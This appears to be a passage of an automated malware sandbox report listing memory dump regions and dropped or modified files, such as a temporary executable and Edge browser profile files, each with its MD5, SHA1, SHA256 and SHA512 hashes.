SHA512 0767cba9f10154b4e28cf6a55b6fc827a96c4fbc88e2d67acd645a0a7a604a3beb63ea58d7febcf8b17de1ea3d2097e76ceac1b36b9fecf9a0945a31a9e211c3

memory/6208-645-0x0000000000400000-0x00000000004AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/5860-654-0x00007FF840460000-0x00007FF840F21000-memory.dmp

memory/6208-653-0x00007FF840460000-0x00007FF840F21000-memory.dmp

memory/6208-652-0x000001C75BB20000-0x000001C75BC04000-memory.dmp

memory/6208-656-0x000001C75A340000-0x000001C75A350000-memory.dmp

memory/6152-657-0x0000000002730000-0x0000000002731000-memory.dmp

memory/7508-658-0x0000000074AB0000-0x0000000075260000-memory.dmp

memory/6208-659-0x000001C75BB20000-0x000001C75BC01000-memory.dmp

memory/6208-660-0x000001C75BB20000-0x000001C75BC01000-memory.dmp

memory/6208-662-0x000001C75BB20000-0x000001C75BC01000-memory.dmp

memory/6208-664-0x000001C75BB20000-0x000001C75BC01000-memory.dmp

memory/6208-666-0x000001C75BB20000-0x000001C75BC01000-memory.dmp

memory/6208-668-0x000001C75BB20000-0x000001C75BC01000-memory.dmp

memory/6208-670-0x000001C75BB20000-0x000001C75BC01000-memory.dmp

memory/6208-672-0x000001C75BB20000-0x000001C75BC01000-memory.dmp

memory/6208-674-0x000001C75BB20000-0x000001C75BC01000-memory.dmp

memory/6208-676-0x000001C75BB20000-0x000001C75BC01000-memory.dmp

memory/6208-678-0x000001C75BB20000-0x000001C75BC01000-memory.dmp

memory/6208-680-0x000001C75BB20000-0x000001C75BC01000-memory.dmp

memory/6208-682-0x000001C75BB20000-0x000001C75BC01000-memory.dmp

memory/6208-684-0x000001C75BB20000-0x000001C75BC01000-memory.dmp

memory/6208-686-0x000001C75BB20000-0x000001C75BC01000-memory.dmp

memory/6208-688-0x000001C75BB20000-0x000001C75BC01000-memory.dmp

memory/6208-690-0x000001C75BB20000-0x000001C75BC01000-memory.dmp

memory/6208-694-0x000001C75BB20000-0x000001C75BC01000-memory.dmp

memory/6208-692-0x000001C75BB20000-0x000001C75BC01000-memory.dmp

memory/6208-696-0x000001C75BB20000-0x000001C75BC01000-memory.dmp

memory/6208-698-0x000001C75BB20000-0x000001C75BC01000-memory.dmp

memory/6208-701-0x000001C75BB20000-0x000001C75BC01000-memory.dmp

memory/6208-704-0x000001C75BB20000-0x000001C75BC01000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 25189300c19c8d07d07f0ec5b9ac8df0
SHA1 8c38360db6ac069df9f203b225348ac699f020b7
SHA256 80664f48abed2305dc6c625d5faabd9c6cfb91a495b3978799e29f6c686a85f6
SHA512 8ba104d264ba9f10b6c60a2a51e0fb6ded1555acca091d16899f49da1635d4372ff5c8813dc02abb0732dce6c0d529708938abd54e2fcf24cd04fb9f7301f862

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 cd57206d74e68e1f70796d0fda0bf24a
SHA1 dbdcb840eae95928031d3e99994d2cdf651ec85b
SHA256 8af9526122c3e5f3d3840c5442672e5c2240c09ed4b01d7252e931c770fbe196
SHA512 1d2b643233f4ec20715020c18fb795eb2648125462e0bfe557c991a0e0048d71c85570e37f45a20c38bc88f1f4141c6e24b1da904af08eb3ec8d21305ad5583c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 3adf02f02a2c784dc1c39c40f4f227dd
SHA1 40d88eace491474d3d10bb4bd8cd2ad879a3da06
SHA256 1b60b46a25067a0d8721ac9e7ac5b66908963a37ca794d20e2c22ce81b4d8a6b
SHA512 091a963daa0ad8ac4c28c2f61ab2741a252dfe4521d3bf3d43974b02fa634234a567d0d99d04c3ff74b068b0fa5b2c26b1eb1195d36a8b1feda78cb7dba63344

memory/5704-773-0x0000000000921000-0x0000000000934000-memory.dmp

memory/5704-775-0x00000000022E0000-0x00000000022E9000-memory.dmp

memory/7804-778-0x0000000074AB0000-0x0000000075260000-memory.dmp

memory/1776-780-0x0000000000400000-0x0000000000409000-memory.dmp

memory/7804-782-0x00000000075B0000-0x00000000075C0000-memory.dmp

memory/6028-804-0x0000000002B70000-0x0000000002F69000-memory.dmp

memory/6028-811-0x0000000002F70000-0x000000000385B000-memory.dmp

memory/6028-818-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/1776-851-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2159b10b09029abf1903422dc9e405b1
SHA1 66d6731f993374ab67f50021db423c1aef8c975b
SHA256 6604305a0638cdd7f33359708ae02477e07985367b0824c3f6fb474bd03ea60b
SHA512 372bb1b0f8e21537b89325b8a1e9ad72ba31e1dfafa0f46d34fc139712b42e16fa06e282793627a0e4c8f8718ca89c7ec06df2bc8d487787375acb7b43ad0518

memory/7804-1104-0x0000000074AB0000-0x0000000075260000-memory.dmp

memory/1516-1362-0x0000000002BF0000-0x0000000002C26000-memory.dmp

memory/1516-1365-0x0000000074AB0000-0x0000000075260000-memory.dmp

memory/1516-1368-0x0000000005280000-0x00000000058A8000-memory.dmp

memory/1516-1367-0x0000000002C30000-0x0000000002C40000-memory.dmp

memory/6208-1374-0x00007FF840460000-0x00007FF840F21000-memory.dmp

memory/3748-1379-0x0000024CCDD40000-0x0000024CCDD50000-memory.dmp

memory/6208-1381-0x000001C75A340000-0x000001C75A350000-memory.dmp

memory/6152-1383-0x0000000002730000-0x0000000002731000-memory.dmp

memory/3748-1377-0x0000024CCDD40000-0x0000024CCDD50000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p53fgruc.4wq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3748-1390-0x00007FF840460000-0x00007FF840F21000-memory.dmp

memory/1516-1389-0x0000000005A50000-0x0000000005A72000-memory.dmp

memory/3748-1415-0x0000024CE63B0000-0x0000024CE63D2000-memory.dmp

memory/1516-1404-0x0000000005BF0000-0x0000000005C56000-memory.dmp

memory/1516-1420-0x0000000005D80000-0x00000000060D4000-memory.dmp

memory/3748-1430-0x0000024CCDD40000-0x0000024CCDD50000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c42eb7a66e9392f3b2115ec8ca0ff96d
SHA1 76f1d0c647d6675cadc941377ad0ae8e2ac9d1a3
SHA256 ce51b4ef1def9d0738139fcecf1e74651b48bfbaccea5a645ac966e801b31b02
SHA512 c82709f71db6d2d6d905f94536aea9bf7606dbe6438f9c57b1bfa9f60a787e3d54e24e239139b6a9c5c3bcf35db1b601e49ff92643056ddd65f60f5d0e2aa688